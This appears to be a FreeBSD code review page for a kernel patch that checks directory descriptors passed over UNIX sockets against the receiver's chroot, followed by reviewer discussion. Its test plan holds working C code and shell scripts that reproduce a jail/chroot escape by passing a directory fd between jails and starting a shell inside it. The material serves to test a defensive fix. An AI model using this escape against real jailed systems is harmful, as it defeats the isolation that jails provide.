Verify directory fds against chroot when receiving them through SCM_RIGHTS
Needs ReviewPublic
Actions

Authored by firk_cantconnect.ru on Mar 16 2022, 10:28 AM.

Details

Reviewers: None

Summary

This patch adds a way to verify that a given directory vnode really lies under a given
root directory. This is needed to allow cross-jail UNIX-socket communication without
giving the jails a way to escape their chroot through a directory fd sent via SCM_RIGHTS.

net.local.sendfd_check_root
0 - no checks (old behaviour)
1 - check all SCM_RIGHTS received dirfds for this (default)
2 - also check that received dirfds are accessible to current process
(exec-check) when traversing from /.

Without this check, one jail may receive directory fd from another and traverse outside chroot via ../../

This is another approach for bug 262179

Test Plan

There is one C source file and two scripts.
test.sh is to verify net.local.sendfd_check_root=1 effect
test2.sh is to verify net.local.sendfd_check_root=2 effect
In both cases the test opens a shell whose current directory should not be accessible; the attempt fails when the patch is applied and the sysctl is set.

sendfd.c

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <dirent.h>

/*
 * Pass the descriptor fd to the peer of socket s as SCM_RIGHTS ancillary
 * data, accompanied by a single byte of ordinary payload.
 * Returns whatever sendmsg() returns (negative on failure, errno set).
 */
static int send_fd(int s, int fd) {
  /* The union keeps the control buffer aligned for a struct cmsghdr. */
  union {
    char buf[CMSG_SPACE(sizeof(fd))];
    struct cmsghdr align;
  } ctl;
  struct iovec vec;
  struct msghdr hdr;
  struct cmsghdr *cm;

  /* One payload byte: the terminating NUL of an empty string literal. */
  vec.iov_base = "";
  vec.iov_len = 1;

  memset(&hdr, 0, sizeof(hdr));
  hdr.msg_iov = &vec;
  hdr.msg_iovlen = 1;
  hdr.msg_control = ctl.buf;
  hdr.msg_controllen = sizeof(ctl.buf);

  cm = CMSG_FIRSTHDR(&hdr);
  cm->cmsg_level = SOL_SOCKET;
  cm->cmsg_type = SCM_RIGHTS;
  cm->cmsg_len = CMSG_LEN(sizeof(fd));
  memcpy(CMSG_DATA(cm), &fd, sizeof(fd));

  return sendmsg(s, &hdr, 0);
}

/*
 * Receive one descriptor sent as SCM_RIGHTS ancillary data on socket s,
 * together with one byte of ordinary payload.
 * Returns the received descriptor, or -1 after printing a diagnostic to
 * stderr when recvmsg() fails or the control data is not exactly one
 * SCM_RIGHTS message carrying a single int.
 */
static int recv_fd(int s) {
  int received;
  char payload[1];
  /* The union keeps the control buffer aligned for a struct cmsghdr. */
  union {
    char buf[CMSG_SPACE(sizeof(received))];
    struct cmsghdr align;
  } ctl;
  struct iovec vec = {.iov_base = payload, .iov_len = 1};
  struct msghdr hdr = {.msg_iov = &vec,
                       .msg_iovlen = 1,
                       .msg_control = ctl.buf,
                       .msg_controllen = sizeof(ctl.buf)};
  struct cmsghdr *cm;

  if (recvmsg(s, &hdr, 0) < 0) {
    fprintf(stderr, "recvmsg() error %d (%s)\n", errno, strerror(errno));
    return -1;
  }

  /* The control data must fill the buffer exactly. */
  if (hdr.msg_controllen != sizeof(ctl.buf)) {
    fprintf(stderr, "wrong recv\n");
    return -1;
  }

  cm = CMSG_FIRSTHDR(&hdr);
  if (cm == NULL) {
    fprintf(stderr, "wrong recv 2\n");
    return -1;
  }

  if (!(cm->cmsg_level == SOL_SOCKET &&
        cm->cmsg_type == SCM_RIGHTS &&
        cm->cmsg_len == CMSG_LEN(sizeof(received)))) {
    fprintf(stderr, "wrong recv 2\n");
    return -1;
  }

  memcpy(&received, CMSG_DATA(cm), sizeof(received));
  return received;
}

/*
 * Serve one descriptor over a UNIX-domain stream socket.
 *
 * Binds a listening socket at spath, opens fpath read-only, and then sends
 * that descriptor (via send_fd) to every client that connects.
 *
 * The accept loop never terminates; the function only returns, with -1,
 * when setup fails (path too long, socket/bind/listen/open error).  A
 * diagnostic is printed to stderr in each case.
 */
static int do_listen(char const * spath, char const * fpath) {
  int lfd, afd, fd, n;
  struct sockaddr_un sa;
  struct stat sb;

  memset(&sa, 0, sizeof(sa));
  sa.sun_family = AF_UNIX;
  /* Refuse an over-long path instead of silently binding to a truncated one. */
  n = snprintf(sa.sun_path, sizeof(sa.sun_path), "%s", spath);
  if (n < 0 || (size_t)n >= sizeof(sa.sun_path)) {
    fprintf(stderr, "socket path too long: %s\n", spath);
    return -1;
  }

  /*
   * Remove an existing socket at spath so that bind() can succeed; any
   * other kind of file is left untouched.  A failed unlink() shows up as
   * a bind() error below.
   */
  if (lstat(spath, &sb) >= 0 && S_ISSOCK(sb.st_mode)) unlink(spath);

  if ((lfd = socket(PF_UNIX, SOCK_STREAM, 0)) < 0) {
    fprintf(stderr, "socket() error %d (%s)\n", errno, strerror(errno));
    return -1;
  }
  if (bind(lfd, (struct sockaddr*)&sa, sizeof(sa)) < 0) {
    fprintf(stderr, "bind() error %d (%s)\n", errno, strerror(errno));
    close(lfd);
    return -1;
  }
  if (listen(lfd, 1) < 0) {
    fprintf(stderr, "listen() error %d (%s)\n", errno, strerror(errno));
    close(lfd);
    return -1;
  }

  if ((fd = open(fpath, O_RDONLY)) < 0) {
    fprintf(stderr, "open() error %d (%s)\n", errno, strerror(errno));
    close(lfd);
    return -1;
  }

  fprintf(stderr, "started listening at %s sharing %s\n", spath, fpath);
  while (1) {
    if ((afd = accept(lfd, NULL, NULL)) < 0) {
      fprintf(stderr, "accept() error %d (%s)\n", errno, strerror(errno));
      sleep(1);
      continue;
    }
    if (send_fd(afd, fd) < 0)
      fprintf(stderr, "send_fd() error %d (%s)\n", errno, strerror(errno));
    /* Presumably gives the peer time to receive before the connection is closed. */
    sleep(1);
    close(afd);
  }
}

/*
 * Connect to the UNIX-domain stream socket at spath.
 *
 * Returns the connected socket descriptor, or -1 after printing a
 * diagnostic to stderr.  A path that does not fit in sun_path is rejected
 * rather than copied (the unbounded copy would overflow the address
 * structure), and the socket is closed again if connect() fails.
 */
static int do_connect(char const * spath) {
  struct sockaddr_un sa;
  int fd, n;

  memset(&sa, 0, sizeof(sa));
  sa.sun_family = AF_UNIX;
  n = snprintf(sa.sun_path, sizeof(sa.sun_path), "%s", spath);
  if (n < 0 || (size_t)n >= sizeof(sa.sun_path)) {
    fprintf(stderr, "socket path too long: %s\n", spath);
    return -1;
  }

  if ((fd = socket(PF_UNIX, SOCK_STREAM, 0)) < 0) {
    fprintf(stderr, "socket() error %d (%s)\n", errno, strerror(errno));
    return -1;
  }
  if (connect(fd, (struct sockaddr*)&sa, sizeof(sa)) < 0) {
    fprintf(stderr, "connect() error %d (%s)\n", errno, strerror(errno));
    close(fd);
    return -1;
  }
  return fd;
}

/*
 * Copy everything readable from fd to standard output (descriptor 1).
 *
 * Returns 0 once read() reports end of file, or -1 after printing a
 * diagnostic to stderr if read() or write() fails.  Short writes are
 * retried until the whole chunk has been written.
 */
static int do_read(int fd) {
  char buf[1024];
  ssize_t got;

  while ((got = read(fd, buf, sizeof(buf))) > 0) {
    ssize_t off = 0;
    while (off < got) {
      ssize_t put = write(1, buf + off, (size_t)(got - off));
      if (put < 0) {
        fprintf(stderr, "write error %d (%s)\n", errno, strerror(errno));
        return -1;
      }
      off += put;
    }
  }
  if (got < 0) {
    fprintf(stderr, "read error %d (%s)\n", errno, strerror(errno));
    return -1;
  }
  return 0;
}

/*
 * Print the names of the entries of a directory, one per line, to stdout.
 *
 * If path is NULL, fd itself is listed; otherwise path is opened relative
 * to fd with openat() and that directory is listed instead.
 *
 * The listed descriptor is handed to fdopendir() and released with
 * closedir() when the listing is done, so with path == NULL the caller's
 * fd is closed on return from a listing.  If fdopendir() fails, only a
 * descriptor opened here is closed.
 *
 * Returns 0 on success, or -1 after printing a diagnostic to stderr.
 */
static int do_ls(int fd, char const * path) {
  DIR * dp;
  struct dirent * de;
  int opened_here = 0;
  int saved_errno;

  if (path) {
    if ((fd = openat(fd, path, O_RDONLY)) < 0) {
      fprintf(stderr, "open(%s) error %d (%s)\n", path, errno, strerror(errno));
      return -1;
    }
    opened_here = 1;
  }

  if (!(dp = fdopendir(fd))) {
    fprintf(stderr, "fdopendir error %d (%s)\n", errno, strerror(errno));
    if (opened_here) close(fd);
    return -1;
  }

  /* errno is cleared before each readdir() so that a NULL result can be
     told apart: end of directory leaves it 0, an error sets it. */
  while (errno = 0, (de = readdir(dp)) != NULL) {
    printf("%s\n", de->d_name);
  }
  saved_errno = errno;  /* closedir() may overwrite errno */
  closedir(dp);

  if (saved_errno) {
    fprintf(stderr, "readdir error %d (%s)\n", saved_errno, strerror(saved_errno));
    return -1;
  }
  return 0;
}


/*
 * Entry point.
 *
 *   sendfd listen <socket> <path>   bind <socket>, open <path>, and send the
 *                                   descriptor to every client (do_listen)
 *   sendfd <mode> <socket>          connect to <socket>, receive a
 *                                   descriptor, then act on it per <mode>:
 *       read         copy its contents to stdout
 *       ls           list it as a directory
 *       ls:<subpath> list <subpath> opened relative to it
 *       sleep        keep it open and sleep forever
 *       sh           fchdir() into it and run /bin/sh
 *
 * Any other <mode> just receives the descriptor and exits with 0.
 * Returns 0 on success and -1 on failure, including failures reported by
 * the selected mode.
 */
int main(int argc, char * * argv) {
  int fd, rfd;
  char const * mode;

  if (argc == 4 && !strcmp(argv[1], "listen")) return do_listen(argv[2], argv[3]);
  if (argc != 3 || !strcmp(argv[1], "listen")) {
    fprintf(stderr,
            "usage: sendfd listen <socket> <path>\n"
            "       sendfd read|ls|ls:<subpath>|sleep|sh <socket>\n");
    return -1;
  }

  mode = argv[1];
  if ((fd = do_connect(argv[2])) < 0) return -1;
  if ((rfd = recv_fd(fd)) < 0) return -1;
  fprintf(stderr, "rfd = %d\n", rfd);

  /* The modes are mutually exclusive, so each one can return directly. */
  if (!strcmp(mode, "read")) return do_read(rfd) < 0 ? -1 : 0;
  if (!strcmp(mode, "ls")) return do_ls(rfd, NULL) < 0 ? -1 : 0;
  if (!strncmp(mode, "ls:", 3)) return do_ls(rfd, mode + 3) < 0 ? -1 : 0;
  if (!strcmp(mode, "sleep")) while (1) sleep(1);
  if (!strcmp(mode, "sh")) {
    if (fchdir(rfd) < 0) {
      fprintf(stderr, "fchdir() error %d (%s)\n", errno, strerror(errno));
      return -1;
    }
    fprintf(stderr, "starting subshell\n");
    if (system("/bin/sh") == -1) {
      fprintf(stderr, "system() error %d (%s)\n", errno, strerror(errno));
      return -1;
    }
  }
  return 0;
}

test.sh

# Build the helper and populate two jail roots, j/1 and j/2, each with a
# copy of /bin, /lib and /libexec plus the sendfd binary.
BASE=$(pwd)
cc -o sendfd sendfd.c
mkdir j j/1 j/2
for n in 1 2; do
    tar -c -f - /bin /lib /libexec | tar -x -f - -C "j/$n"
done
for n in 1 2; do
    cp sendfd "j/$n/bin"
done
mkdir j/1/shared j/2/shared

# Make j/2's shared directory visible inside j/1, so both jails can reach
# the same socket as /shared/2.sock.
mount -t nullfs "$BASE/j/2/shared" "$BASE/j/1/shared"

# Jail 2 listens in the background and shares its own /bin directory.
jail "$BASE/j/2" x 127.0.0.1 /bin/sendfd listen /shared/2.sock /bin &
sleep 2

# Jail 1 receives the directory fd, changes into it and starts a shell.
jail "$BASE/j/1" x 127.0.0.1 /bin/sendfd sh /shared/2.sock

# Clean up: stop the listener and drop the nullfs mount.
killall sendfd
umount "$BASE/j/1/shared"

test2.sh (note that $BASE itself should be world-accessible)

# Build the helper and create 1/2/3, then remove all permissions from the
# top directory "1".
BASE=$(pwd)
SOCK="$BASE/s"
cc -o sendfd sendfd.c
mkdir -p 1/2/3
chmod 0 1

# The listener (run by the invoking user) shares an fd for 1/2.
./sendfd listen "$SOCK" "$BASE/1/2" &
sleep 2

# Let any user connect to the socket, then receive the fd as "nobody" and
# start a shell inside the received directory.
chmod 777 "$SOCK"
su -m nobody -c "$BASE/sendfd sh $SOCK"

# Clean up: stop the listener.
killall sendfd

Diff Detail

Repository

rG FreeBSD src repository

Lint

Lint Skipped

Unit

Tests Skipped

Event Timeline

firk_cantconnect.ru created this revision.Mar 16 2022, 10:28 AM

Herald added a subscriber: imp. · View Herald TranscriptMar 16 2022, 10:28 AM

firk_cantconnect.ru requested review of this revision.Mar 16 2022, 10:28 AM

zarychtam_plan-b.pwste.edu.pl added a subscriber: zarychtam_plan-b.pwste.edu.pl.Mar 16 2022, 11:27 AM

firk_cantconnect.ru edited the test plan for this revision. (Show Details)Mar 16 2022, 6:59 PM

zarychtam_plan-b.pwste.edu.pl removed a subscriber: zarychtam_plan-b.pwste.edu.pl.Mar 16 2022, 7:47 PM

firk_cantconnect.ru added a subscriber: mjg.Mar 28 2022, 9:48 PM

I'm going to have to sleep on the approach. This is a known escape, but I don't know if the method used can fully plug it. For example it is possible to share file descriptor tables, and one of the processes may not be encumbered by the jail. As is it does solve it for processes which have no way to talk to each other apart from a partially shared fs though.

head/sys/kern/uipc_usrreq.c
163	should be bool
2026	this can't be true at this stage
head/sys/kern/vfs_lookup.c
1523	this routine should utilize a walk similar to vn_fullpath_dir

For example it is possible to share file descriptor tables, and one of the processes may not be encumbered by the jail.

I can't imagine a way how this could lead to gaining unexpected access by jailed process.

And if one jailed process can directly (without shared mountpoint boundaries) walk to the files of another while not having the same rootdir, things become much worse. As a partial fix, the same check may be added for all dotdot-traversing requests from userspace, but there will still be other possible holes.

head/sys/kern/uipc_usrreq.c
163	There are three possible values: 0 = no checks, 1 = chroot check, 2 = chroot + absolute path access check.
head/sys/kern/vfs_lookup.c
1523	But vn_fullpath_dir does a lot of extra work: it opens each traversed vnode for reading and scans it for the child (previously seen) directory name (see vop_stdvptocnp()), which is completely unneeded here. I see no way to avoid this without huge refactoring, because vop_stdvptocnp() is part of the VOP API. Instead I've done the walk based on vfs_lookup(), simulating a path like "../../../../". What's wrong with it?

firk_cantconnect.ru added a subscriber: glebius.Jun 3 2022, 10:24 PM

I can't see how this can be used maliciously, e.g. forcing some application outside of jail to send its SCM_RIGHTS to a jail. Even if such case exists for a certain application, that would be bug in that application, IMHO. The initial idea of SCM_RIGHTS was actually to grant rights intentionally, so there can be a valid case for a certain application that wants to grant rights to its peer in a jail.

In D34579#828698, @glebius wrote:

I can't see how this can be used maliciously, e.g. forcing some application outside of jail to send its SCM_RIGHTS to a jail.

Not only this. If we have two separately jailed applications interacting via a UNIX socket, one could send SCM_RIGHTS with its / to the other. The second application, while having a different root directory, may then traverse upwards from the first's received /.

UNIX socket connection may be established through shared nullfs mount or via socketpair() from their common parent. Such cross-jail UNIX sockets are surely not a bug themselves, and they are useful. But the only problem is this vulnerable fd sharing via them.

crest_freebsd_rlwinm.de added a subscriber: crest_freebsd_rlwinm.de.Jul 26 2023, 5:20 PM